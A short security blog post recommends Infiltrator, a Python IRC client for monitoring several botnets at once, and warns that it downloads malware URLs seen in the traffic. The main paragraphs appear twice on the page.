Infiltrator Botnet Monitor
Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"
New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is incredibly impossible. Furthermore, monitoring custom IRCd's with an RFC compliant client will likely raise the suspicions of the botherder.
A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.
Paul has not had a chance to review the code yet and my python is very weak but I could not see anything too dangerous. Just remember this client will download urls seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. Its missing documentation, but if you have a few minutes - give it a shot!
New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is incredibly impossible. Furthermore, monitoring custom IRCd's with an RFC compliant client will likely raise the suspicions of the botherder.
A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.
Paul has not had a chance to review the code yet and my python is very weak but I could not see anything too dangerous. Just remember this client will download urls seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. Its missing documentation, but if you have a few minutes - give it a shot!
Labels: Botnet monitoring, Infiltrator, Python
posted by Nicholas at
02:41
1 Comments
